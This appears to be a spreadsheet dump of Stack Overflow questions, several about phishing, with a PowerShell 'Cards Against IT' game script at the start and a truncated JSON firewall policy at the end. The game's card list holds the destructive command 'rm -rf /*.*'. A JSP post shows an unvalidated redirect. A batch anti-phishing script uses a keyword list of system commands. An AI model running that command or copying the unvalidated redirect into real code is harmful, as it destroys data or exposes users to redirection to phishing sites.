 $form1.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon('C:\Users\christnerw\Desktop\Powers hell Project\flat_icons-graficheria.ico')
 $form1.Name = "form1"
 $form1.Text = "Cards Aghinst IT"
 $form1.add_Load($handler_form1_Load)
 $richTextBox9.BackColor = [System.Drawing.Color]::FromArgb(255,255,255,255)
 $richTextBox9.Cursor = [System.Windows.Forms.Cursors]::Hand
 $richTextBox9.DataBindings.DefaultDataSourceUpdateMode = 0
 $richTextBox9.Font = New-Object System.Drawing.Font("Microsoft Sans Serif",8.25,1,3,1)
 $System_Drawing_Point = New-Object System.Drawing.Point
 $System_Drawing_Point.X = 992
 $System_Drawing_Point.Y = 532
 $richTextBox9.Location = $System_Drawing_Point
 $richTextBox9.Name = "richTextBox9"
 $richTextBox9.ReadOnly = $True
 $System_Drawing_Size = New-Object System.Drawing.Size
 $System_Drawing_Size.Height = 223
 $System_Drawing_Size.Width = 283
 $richTextBox9.Size = $System_Drawing_Size
 $richTextBox9.TabIndex = 12
 $richTextBox9.Text = ""
 $form1.Controls.Add($richTextBox9)
 $card.DataBindings.DefaultDataSourceUpdateMode = 0
 $card.Font = New-Object System.Drawing.Font("Microsoft Sans Serif",12,1,3,1)
 $System_Drawing_Point = New-Object System.Drawing.Point
 $System_Drawing_Point.X = 1062
 $System_Drawing_Point.Y = 198
 $card.Location = $System_Drawing_Point
 $card.Name = "card"
 $System_Drawing_Size = New-Object System.Drawing.Size
 $System_Drawing_Size.Height = 51
 $System_Drawing_Size.Width = 189
 $card.Size = $System_Drawing_Size
 $card.TabIndex = 10
 $card.Text = "Click for White Card"
 $card.UseVisualStyleBackColor = $True
 $card.add_Click($card_OnClick)
 $form1.Controls.Add($card)
 $richTextBox8.BackColor = [System.Drawing.Color]::FromArgb(255,255,255,255)
 $richTextBox8.Cursor = [System.Windows.Forms.Cursors]::Hand
 $richTextBox8.DataBindings.DefaultDataSourceUpdateMode = 0
 $richTextBox8.Font = New-Object System.Drawing.Font("Microsoft Sans Serif",8.25,1,3,1)
 $System_Drawing_Point = New-Object System.Drawing.Point
 $System_Drawing_Point.X = 686
 $System_Drawing_Point.Y = 532
 $richTextBox8.Location = $System_Drawing_Point
 $richTextBox8.Name = "richTextBox8"
 $richTextBox8.ReadOnly = $True
 $System_Drawing_Size = New-Object System.Drawing.Size
 $System_Drawing_Size.Height = 223
 $System_Drawing_Size.Width = 283
 $richTextBox8.Size = $System_Drawing_Size
 $richTextBox8.TabIndex = 8
 $richTextBox8.Text = ""
 $form1.Controls.Add($richTextBox8)
 $richTextBox7.BackColor = [System.Drawing.Color]::FromArgb(255,255,255,255)
 $richTextBox7.Cursor = [System.Windows.Forms.Cursors]::Hand
 $richTextBox7.DataBindings.DefaultDataSourceUpdateMode = 0
 $richTextBox7.Font = New-Object System.Drawing.Font("Microsoft Sans Serif",8.25,1,3,1)
 $System_Drawing_Point = New-Object System.Drawing.Point
 $System_Drawing_Point.X = 365
 $System_Drawing_Point.Y = 532
 $richTextBox7.Location = $System_Drawing_Point
 $richTextBox7.Name = "richTextBox7"
 $richTextBox7.ReadOnly = $True
 $System_Drawing_Size = New-Object System.Drawing.Size
 $System_Drawing_Size.Height = 223
 $System_Drawing_Size.Width = 297
 $richTextBox7.Size = $System_Drawing_Size
 $richTextBox7.TabIndex = 7
 $richTextBox7.Text = ""
 $richTextBox7.add_TextChanged($handler_richTextBox7_TextChanged)
 $form1.Controls.Add($richTextBox7)
 $richTextBox6.BackColor = [System.Drawing.Color]::FromArgb(255,255,255,255)
 $richTextBox6.Cursor = [System.Windows.Forms.Cursors]::Hand
 $richTextBox6.DataBindings.DefaultDataSourceUpdateMode = 0
 $richTextBox6.Font = New-Object System.Drawing.Font("Microsoft Sans Serif",8.25,1,3,1)
 $System_Drawing_Point = New-Object System.Drawing.Point
 $System_Drawing_Point.X = 60
 $System_Drawing_Point.Y = 532
 $richTextBox6.Location = $System_Drawing_Point
 $richTextBox6.Name = "richTextBox6"
 $richTextBox6.ReadOnly = $True
 $System_Drawing_Size = New-Object System.Drawing.Size
 $System_Drawing_Size.Height = 223
 $System_Drawing_Size.Width = 283
 $richTextBox6.Size = $System_Drawing_Size
 $richTextBox6.TabIndex = 6
 $richTextBox6.Text = ""
 $form1.Controls.Add($richTextBox6)
 $richTextBox5.BackColor = [System.Drawing.Color]::FromArgb(255,255,255,255)
 $richTextBox5.Cursor = [System.Windows.Forms.Cursors]::Hand
 $richTextBox5.DataBindings.DefaultDataSourceUpdateMode = 0
 $richTextBox5.Font = New-Object System.Drawing.Font("Microsoft Sans Serif",8.25,1,3,1)
 $System_Drawing_Point = New-Object System.Drawing.Point
 $System_Drawing_Point.X = 60
 $System_Drawing_Point.Y = 274
 $richTextBox5.Location = $System_Drawing_Point
 $richTextBox5.Name = "richTextBox5"
 $richTextBox5.ReadOnly = $True
 $System_Drawing_Size = New-Object System.Drawing.Size
 $System_Drawing_Size.Height = 223
 $System_Drawing_Size.Width = 283
 $richTextBox5.Size = $System_Drawing_Size
 $richTextBox5.TabIndex = 5
 $richTextBox5.Text = ""
 $richTextBox5.add_TextChanged($handler_richTextBox5_TextChanged)
 $form1.Controls.Add($richTextBox5)
 $richTextBox4.BackColor = [System.Drawing.Color]::FromArgb(255,255,255,255)
 $richTextBox4.Cursor = [System.Windows.Forms.Cursors]::Hand
 $richTextBox4.DataBindings.DefaultDataSourceUpdateMode = 0
 $richTextBox4.Font = New-Object System.Drawing.Font("Microsoft Sans Serif",8.25,1,3,1)
 $System_Drawing_Point = New-Object System.Drawing.Point
 $System_Drawing_Point.X = 992
 $System_Drawing_Point.Y = 274
 $richTextBox4.Location = $System_Drawing_Point
 $richTextBox4.Name = "richTextBox4"
 $richTextBox4.ReadOnly = $True
 $System_Drawing_Size = New-Object System.Drawing.Size
 $System_Drawing_Size.Height = 223
 $System_Drawing_Size.Width = 283
 $richTextBox4.Size = $System_Drawing_Size
 $richTextBox4.TabIndex = 4
 $richTextBox4.Text = ""
 $form1.Controls.Add($richTextBox4)
 $richTextBox3.Cursor = [System.Windows.Forms.Cursors]::Hand
 $richTextBox3.DataBindings.DefaultDataSourceUpdateMode = 0
 $richTextBox3.Font = New-Object System.Drawing.Font("Microsoft Sans Serif",8.25,1,3,1)
 $System_Drawing_Point = New-Object System.Drawing.Point
 $System_Drawing_Point.X = 686
 $System_Drawing_Point.Y = 274
 $richTextBox3.Location = $System_Drawing_Point
 $richTextBox3.Name = "richTextBox3"
 $System_Drawing_Size = New-Object System.Drawing.Size
 $System_Drawing_Size.Height = 223
 $System_Drawing_Size.Width = 283
 $richTextBox3.Size = $System_Drawing_Size
 $richTextBox3.TabIndex = 3
 $richTextBox3.Text = ""
 $form1.Controls.Add($richTextBox3)
 $Czar.DataBindings.DefaultDataSourceUpdateMode = 0
 $Czar.Font = New-Object System.Drawing.Font("Microsoft Sans Serif",12,1,3,1)
 $System_Drawing_Point = New-Object System.Drawing.Point
 $System_Drawing_Point.X = 199
 $System_Drawing_Point.Y = 28
 $Czar.Location = $System_Drawing_Point
 $Czar.Name = "Czar"
 $System_Drawing_Size = New-Object System.Drawing.Size
 $System_Drawing_Size.Height = 68
 $System_Drawing_Size.Width = 135
 $Czar.Size = $System_Drawing_Size
 $Czar.TabIndex = 2
 $Czar.Text = "Click for Czar Card"
 $Czar.UseVisualStyleBackColor = $True
 $Czar.add_Click($handler_Czar_Click)
 $form1.Controls.Add($Czar)
 $richTextBox2.BackColor = [System.Drawing.Color]::FromArgb(255,255,255,255)
 $richTextBox2.Cursor = [System.Windows.Forms.Cursors]::Hand
 $richTextBox2.DataBindings.DefaultDataSourceUpdateMode = 0
 $richTextBox2.Font = New-Object System.Drawing.Font("Microsoft Sans Serif",8.25,1,3,1)
 $System_Drawing_Point = New-Object System.Drawing.Point
 $System_Drawing_Point.X = 365
 $System_Drawing_Point.Y = 274
 $richTextBox2.Location = $System_Drawing_Point
 $richTextBox2.Name = "richTextBox2"
 $richTextBox2.ReadOnly = $True
 $System_Drawing_Size = New-Object System.Drawing.Size
 $System_Drawing_Size.Height = 223
 $System_Drawing_Size.Width = 297
 $richTextBox2.Size = $System_Drawing_Size
 $richTextBox2.TabIndex = 1
 $richTextBox2.Text = ""
 $form1.Controls.Add($richTextBox2)
 $richTextBox1.BackColor = [System.Drawing.Color]::FromArgb(255,0,0,0)
 $richTextBox1.Cursor = [System.Windows.Forms.Cursors]::Hand
 $richTextBox1.DataBindings.DefaultDataSourceUpdateMode = 0
 $richTextBox1.Font = New-Object System.Drawing.Font("Microsoft Sans Serif",8.25,1,3,1)
 $richTextBox1.ForeColor = [System.Drawing.Color]::FromArgb(255,255,255,255)
 $System_Drawing_Point = New-Object System.Drawing.Point
 $System_Drawing_Point.X = 391
 $System_Drawing_Point.Y = 28
 $richTextBox1.Location = $System_Drawing_Point
 $richTextBox1.Name = "richTextBox1"
 $richTextBox1.ReadOnly = $True
 $System_Drawing_Size = New-Object System.Drawing.Size
 $System_Drawing_Size.Height = 221
 $System_Drawing_Size.Width = 490
 $richTextBox1.Size = $System_Drawing_Size
 $richTextBox1.TabIndex = 0
 $richTextBox1.Text = ""
 $form1.Controls.Add($richTextBox1)
 #endregion Generated Form Code
 #Save the initial state of the form
 $InitialFormWindowState = $form1.WindowState
 #Init the OnLoad event to correct the initial state of the form
 $form1.add_Load($OnLoadForm_StateCorrection)
 #Show the Form
 $form1.ShowDialog()| Out-Null
 } #End Function
 #Call the Function
 GenerateForm
 # Cards
 ########################################################################################
  $white = 
  "Rotating the Backup Tapes" ,
  "a PEBCAK" ,
  "rm -rf /*.*" ,
  "a faulty crossover cable" ,
  "a KVM with a broken M" ,
  "a one button mouse" ,
  "a laser pointer" ,
  "scanning a little too much with nmap" ,
  "a coffee stained mousepad" ,
  "a webcam pointed at the coffee maker" ,
  "a bastion host" ,
  "a salvaged motherboard with a parallel port" ,
  "a razorsharp punchdown tool" ,
  "my rooted phone" ,
  "a mouse connected serial -&amp;gt; ps/2 -&amp;gt; usb" ,
  "0118 999 881 999 119 725...3" ,
  "my password" ,
  "a fingerprint scanner" ,
  "a scanning electron microscope" ,
  "a helpdesk ticket to 'fix the cpu'" ,
  "a hard drive degaussing machine" ,
  "a multitool with a bottle opener" ,
  "a larger database connection pool" ,
  "a rainbow pack of 3.5 floppy disks" ,
  "a usb stick found in the parking lot" ,
  "an Arduino runnning NetBSD" ,
  "a shell script written in BASIC" ,
  "Edward Snowden" ,
  "CryptoLocker" ,
  "a serial port mouse" ,
  "5000 free AOL CDs" ,
  "Angelina Jolie in Hackers" ,
  "an RJ-45 crimping tool" ,
  "Clippy" ,
  "Two Factor Auth" ,
  "Have you tried turning it off and on again" ,
  "a flaky VPN connection" ,
  "script kiddies" ,
  "an IP Webcam with a default password" ,
  "rebuilding a RAID array" ,
  "manually fixing 10/100/1000 'auto' negotiation" ,
  "viewing web filter block logs" ,
  "the server is down" ,
  "pinging 127.0.0.1" ,
  "Using hillary clinton's private email server"
  ##################################################################################################
  $czar = 
  "The new IT Director has a sick tattoo of ____________",
  "The last consultant was fired over ____________",
  "In a pinch, ____________ can be used to remote reboot a server",
  "____________ is Layer 8 of the OSI networking model",
  "Forgetting ____________ in the datacenter is a firing offense",
  "We're going to use ____________ instead of updating to IPv6",
  "____________ is the last stage of our ____________ rollout (Pick 2)",
  "That red plunger switch on the wall launches ____________",
  "I got this coffee mug from a conference about ____________ back in 1997",
  "Had a user fall prey to a sophisticated ____________ phishing attack",
  "Two factor auth with ____________ and ____________ (Pick 2)",
  "Forgot my badge this morning and had to use ____________ to get in",
  "____________ is now included for free with every OS Update",
  "____________ is now required every time you restart ____________ (Pick 2)",
  "The hot new videogame this year is ____________ Simulator!",
  "A helpdesk call to fix ____________ with ____________ (Pick 2)",
  "I just got a new certification in ____________"
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>Grab email of whoever clicks link</t>
  </si>
  <si>
    <t>&lt;p&gt;So I'm trying to help pentest my organization and the only problem I'm running into is that how to track who clicks our &amp;quot;malicious&amp;quot; link. I'm inexperienced with stuff like tracking pixels and I don't want to send a custom email to every single member, so I would really appreciate an economical solution that's simple and easy to set up. I think scripting might work, but I've never used anything like Google Apps Script before.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;google-apps-script&gt;&lt;tracking&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Google python API for Admin Console Spam policies</t>
  </si>
  <si>
    <t>&lt;p&gt;I looked all over the internet and didn't find the relevant Python API for the settings in the following image in Google Admin Console:
 &lt;a href="https://i.stack.imgur.com/0errr.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/0errr.jpg" alt="Admin Console - Gmail - Spam, phishing and malware settings" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I'm trying to modify Spam rules and Email allowlist over API.&lt;/p&gt;
 &lt;p&gt;Thanks!&lt;/p&gt;
 &lt;p&gt;I looked all over Google's API docs&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;gmail-api&gt;&lt;google-admin-sdk&gt;&lt;google-api-python-client&gt;</t>
  </si>
  <si>
    <t>What unexpected things can I learn about a user from their browser?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm giving a class of high school students a demo of unexpected things a webpage can tell about them from their mobile - even if they're not signed in or anything. So far I have picked a couple of things most people would know about, like:&lt;/p&gt;
 &lt;p&gt;Device OS&lt;/p&gt;
 &lt;p&gt;Specific handset (unless you're on iPhone, then it's just iPhone)&lt;/p&gt;
 &lt;p&gt;Language setting&lt;/p&gt;
 &lt;p&gt;And a couple of more obscure things:&lt;/p&gt;
 &lt;p&gt;Carrier (hitting a remote service and returning JSONP since js is IP naive)&lt;/p&gt;
 &lt;p&gt;Battery level / charge status (I didn't even know you could do this until today)&lt;/p&gt;
 &lt;p&gt;Can you think of anything else cool / creepy in a similar vein that I can dig out of UA / Navigator / etc? Most of them are running Chrome under Android or iOS (which is lucky, not every browser supports the battery thing). The main event is about mobile safety and phishing so I'd like to stick to mobile phones.&lt;/p&gt;
 &lt;p&gt;Quick edit: for clarity, I'm building out a site they will go to which will actually demo these features - so unfortunately they need to be implemented, at least in Chrome, vs planned / drafts.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;user-agent&gt;&lt;navigator&gt;</t>
  </si>
  <si>
    <t>XSS Issues while redirecting to a new URL</t>
  </si>
  <si>
    <t>&lt;p&gt;I am working on an old jsp application which contains code similar to following:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;%
  String ref = request.getParameter("ref");
  response.sendRedirect(ref);
 %&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The parameter ref is clearly visible in the URL and anyone can edit it. According to OWASP security standards, this code is vulnerable to XSS attacks. As per OWASP:
 This vulnerability could be used as part of a phishing scam by redirecting users to a malicious site. If no validation is applied, a malicious user could create a hyperlink to redirect your users to an unvalidated malicious website.&lt;/p&gt;
 &lt;p&gt;In my case this is being used only for the logout page. And in any case the malicious user cannot control this paramneter for any other user's session. Also, this variable's value is not being controlled by user input.&lt;/p&gt;
 &lt;p&gt;Please share your thoughts if this is still a XSS vulnerability or not ?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;jsp&gt;&lt;xss&gt;</t>
  </si>
  <si>
    <t>how do I get rid of the secure nonsecure warning on page with iframe under SSL with phishing filter?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a page under SSL with an iframe that refreshes itself every 20 seconds through an HTTP refresh prgama. If I browse the site with IE7 and phishing filter enabled I receive secure-nonsecure content warnings in irregular intervals which cease if phishing filter is disabled. Does anybody have an idea what I can do in order to get rid of the warnings even if phishing filter is enabled?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Manu</t>
  </si>
  <si>
    <t>&lt;ssl&gt;&lt;filter&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Kali Linux | Social Engineering Toolkit | Email not being sent</t>
  </si>
  <si>
    <t>&lt;p&gt;Using the setoolkit, I was able to complete all the steps for sending the email attack. However, no email is being sent, what is the problem?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Anti-Phishing software with batch</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to make a basic anti-phishing software with batch. I am using it to delete html files that are similar to the gmail login page. Here's my code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;@echo off
 color fc
 title Anti-Phishing
 cls
 echo ===============
 echo [Anti-Phishing]
 echo ===============
 echo If There's no message ,You are protected.
 set /p a=Enter a HTML file to scan: 
 for /f %%x in ('findstr /i /m "gmail google add account" %a%.html') do (
  if /i %%x equ %a%.html (
  for /f %%z in ('findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.html') do (
  if /i %%z equ %a%.html (
  cls
  echo Fake Page Detected!!
  del %a%.html
  echo %a%.html was deleted....
  pause &amp;gt;nul
  )
  )
  )
 )
 pause &amp;gt;nul
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;It says that it cannot open the html file. Please help me understand my mistake. I am pretty new to batch.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;batch-file&gt;</t>
  </si>
  <si>
    <t>Why does Google make my website a "Deceptive Site Ahead"</t>
  </si>
  <si>
    <t>&lt;p&gt;I have installed a Drupal7 site on Debian 9 with Apache 2.4 and MariaDB 10.&lt;/p&gt;
 &lt;p&gt;But I am getting a &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Deceptive site ahead &lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;warning on Chrome though the Google Webmaster tool shows that no security threats were found...&lt;/p&gt;
 &lt;p&gt;But Chrome designates the following types of URLs as phishing:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;/sites/all/modules/views/css/views.css?pexgy1
 /sites/all/themes/theme/media.css?pexgy1
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Has anybody any idea what could be wrong?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;web&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Are browsers vulnerable to master password phishing attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;Can a website launch a phishing attack on a browser master password analogous to the &lt;a href="https://www.seancassidy.me/lostpass.html" rel="nofollow"&gt;Lostpass phishing exploit against LastPass&lt;/a&gt;?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;browser&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Assurance that a User is on the "Right" Web Page?</t>
  </si>
  <si>
    <t>&lt;p&gt;When you create a web application, how can you be sure a user is on your web page and not on a spoofed web page utilized in a MITM attack?&lt;/p&gt;
 &lt;p&gt;This simply stated problem seems incredibly difficult to solve.&lt;/p&gt;
 &lt;p&gt;Solutions like one time pass codes (OTP) through SMS or RSA are fallible if the user thinks he/she is on "www.chase.com" but is really on "www.chaze.com" (see the graphic below).&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/WJRPa.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/WJRPa.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Any insight/help with this question will be greatly appreciated. &lt;/p&gt;
 &lt;p&gt;WebAuthn is NOT the answer.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;authentication&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Why am I getting dictionary key arror</t>
  </si>
  <si>
    <t>&lt;p&gt;I am reading a JSON file which has nested dictionaries and when fetched the value of top tree the data looks like below. I need to iterate to below data and fetch information of each element like&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;
 {
  &amp;quot;access-policy&amp;quot;:[
  {
  &amp;quot;name&amp;quot;:&amp;quot;Allow_Redundant_Device&amp;quot;,
  &amp;quot;match&amp;quot;:{
  &amp;quot;source&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;Intf-Internet1-Failover-Zone&amp;quot;,
  &amp;quot;Intf-Internet1-Zone&amp;quot;
  ]
  },
  &amp;quot;user&amp;quot;:{
  &amp;quot;local-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;external-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;user-type&amp;quot;:&amp;quot;any&amp;quot;
  }
  },
  &amp;quot;destination&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;Intf-Internet1-Failover-Zone&amp;quot;,
  &amp;quot;Intf-Internet1-Zone&amp;quot;
  ]
  }
  }
  },
  &amp;quot;set&amp;quot;:{
  &amp;quot;action&amp;quot;:&amp;quot;allow&amp;quot;,
  &amp;quot;lef&amp;quot;:{
  &amp;quot;options&amp;quot;:{
  &amp;quot;send-pcap-data&amp;quot;:{
  &amp;quot;enable&amp;quot;:false
  }
  }
  }
  }
  },
  {
  &amp;quot;name&amp;quot;:&amp;quot;Allow_From_Hostbound&amp;quot;,
  &amp;quot;match&amp;quot;:{
  &amp;quot;source&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;HOST-GLOBAL-Zone&amp;quot;
  ]
  }
  },
  &amp;quot;destination&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;Intf-Global-Zone&amp;quot;,
  &amp;quot;ptvi&amp;quot;
  ]
  }
  }
  },
  &amp;quot;set&amp;quot;:{
  &amp;quot;action&amp;quot;:&amp;quot;allow&amp;quot;
  }
  },
  {
  &amp;quot;name&amp;quot;:&amp;quot;Network_VPN_WEB_TEST&amp;quot;,
  &amp;quot;match&amp;quot;:{
  &amp;quot;source&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;Intf-GLOBAL-Zone&amp;quot;
  ]
  },
  &amp;quot;address&amp;quot;:{
  &amp;quot;address-list&amp;quot;:[
  &amp;quot;VPN12&amp;quot;,
  &amp;quot;1VPN&amp;quot;
  ],
  &amp;quot;address-group-list&amp;quot;:[
  &amp;quot;VPN1&amp;quot;
  ]
  },
  &amp;quot;user&amp;quot;:{
  &amp;quot;local-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;external-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;user-type&amp;quot;:&amp;quot;any&amp;quot;
  }
  },
  &amp;quot;destination&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;L-ST-GLOBAL-Internet1&amp;quot;,
  &amp;quot;L-ST-GLOBAL-Internet2&amp;quot;
  ]
  }
  },
  &amp;quot;services&amp;quot;:{
  &amp;quot;predefined-services-list&amp;quot;:[
  &amp;quot;http&amp;quot;,
  &amp;quot;https&amp;quot;
  ]
  }
  },
  &amp;quot;set&amp;quot;:{
  &amp;quot;security-profile&amp;quot;:{
  &amp;quot;ips&amp;quot;:{
  &amp;quot;predefined-ips-profile&amp;quot;:&amp;quot;Versa Recommended Profile&amp;quot;,
  &amp;quot;predefined-ips-profile-override&amp;quot;:&amp;quot;Predefined-alert-IDS&amp;quot;
  },
  &amp;quot;url-filtering&amp;quot;:{
  &amp;quot;user-defined&amp;quot;:&amp;quot;EMEA_NETWORK_VPN_WEB&amp;quot;
  }
  },
  &amp;quot;action&amp;quot;:&amp;quot;allow&amp;quot;,
  &amp;quot;synced-flow&amp;quot;:&amp;quot;allow&amp;quot;,
  &amp;quot;tcp-session-keepalive&amp;quot;:&amp;quot;disabled&amp;quot;,
  &amp;quot;lef&amp;quot;:{
  &amp;quot;profile&amp;quot;:&amp;quot;Default-Logging-Profile&amp;quot;,
  &amp;quot;event&amp;quot;:&amp;quot;both&amp;quot;,
  &amp;quot;options&amp;quot;:{
  &amp;quot;send-pcap-data&amp;quot;:{
  &amp;quot;enable&amp;quot;:false
  }
  }
  }
  }
  },
  {
  &amp;quot;name&amp;quot;:&amp;quot;GLOBAL-TO-SDWAN&amp;quot;,
  &amp;quot;number&amp;quot;:1,
  &amp;quot;match&amp;quot;:{
  &amp;quot;source&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;Intf-GLOBAL-Zone&amp;quot;
  ]
  },
  &amp;quot;user&amp;quot;:{
  &amp;quot;local-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;external-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;user-type&amp;quot;:&amp;quot;any&amp;quot;
  }
  },
  &amp;quot;destination&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;ptvi&amp;quot;
  ]
  }
  }
  },
  &amp;quot;set&amp;quot;:{
  &amp;quot;action&amp;quot;:&amp;quot;allow&amp;quot;,
  &amp;quot;synced-flow&amp;quot;:&amp;quot;allow&amp;quot;,
  &amp;quot;lef&amp;quot;:{
  &amp;quot;event&amp;quot;:&amp;quot;never&amp;quot;,
  &amp;quot;options&amp;quot;:{
  &amp;quot;send-pcap-data&amp;quot;:{
  &amp;quot;enable&amp;quot;:false
  }
  }
  }
  }
  },
  {
  &amp;quot;name&amp;quot;:&amp;quot;Allow_From_SDWAN&amp;quot;,
  &amp;quot;number&amp;quot;:2,
  &amp;quot;match&amp;quot;:{
  &amp;quot;source&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;ptvi&amp;quot;
  ]
  },
  &amp;quot;user&amp;quot;:{
  &amp;quot;local-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;external-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;user-type&amp;quot;:&amp;quot;any&amp;quot;
  }
  }
  },
  &amp;quot;set&amp;quot;:{
  &amp;quot;action&amp;quot;:&amp;quot;allow&amp;quot;,
  &amp;quot;synced-flow&amp;quot;:&amp;quot;allow&amp;quot;,
  &amp;quot;lef&amp;quot;:{
  &amp;quot;event&amp;quot;:&amp;quot;never&amp;quot;,
  &amp;quot;options&amp;quot;:{
  &amp;quot;send-pcap-data&amp;quot;:{
  &amp;quot;enable&amp;quot;:false
  }
  }
  }
  }
  },
  {
  &amp;quot;name&amp;quot;:&amp;quot;DENY_MGMT_SERVERS&amp;quot;,
  &amp;quot;description&amp;quot;:&amp;quot;CHGxxxx&amp;quot;,
  &amp;quot;match&amp;quot;:{
  &amp;quot;source&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;Intf-GLOBAL-Zone&amp;quot;
  ]
  },
  &amp;quot;address&amp;quot;:{
  &amp;quot;address-group-list&amp;quot;:[
  &amp;quot;AD_MGMT_SERVERS&amp;quot;
  ]
  },
  &amp;quot;user&amp;quot;:{
  &amp;quot;local-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;external-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;user-type&amp;quot;:&amp;quot;any&amp;quot;
  }
  },
  &amp;quot;destination&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;L-ST-GLOBAL-Internet1&amp;quot;,
  &amp;quot;L-ST-GLOBAL-Internet2&amp;quot;
  ]
  }
  }
  },
  &amp;quot;set&amp;quot;:{
  &amp;quot;action&amp;quot;:&amp;quot;deny&amp;quot;,
  &amp;quot;tcp-session-keepalive&amp;quot;:&amp;quot;disabled&amp;quot;,
  &amp;quot;lef&amp;quot;:{
  &amp;quot;event&amp;quot;:&amp;quot;never&amp;quot;,
  &amp;quot;options&amp;quot;:{
  &amp;quot;send-pcap-data&amp;quot;:{
  &amp;quot;enable&amp;quot;:false
  }
  }
  }
  }
  },
  {
  &amp;quot;name&amp;quot;:&amp;quot;DMZ-APPS-FILTERING&amp;quot;,
  &amp;quot;match&amp;quot;:{
  &amp;quot;source&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;Intf-GUEST-Zone&amp;quot;
  ]
  },
  &amp;quot;address&amp;quot;:{
  &amp;quot;address-list&amp;quot;:[
  &amp;quot;1NETS&amp;quot;,
  &amp;quot;2NETS&amp;quot;
  ],
  &amp;quot;address-group-list&amp;quot;:[
  &amp;quot;1GUEST&amp;quot;,
  &amp;quot;2GROUP&amp;quot;
  ]
  },
  &amp;quot;user&amp;quot;:{
  &amp;quot;local-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;external-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;user-type&amp;quot;:&amp;quot;any&amp;quot;
  }
  },
  &amp;quot;destination&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
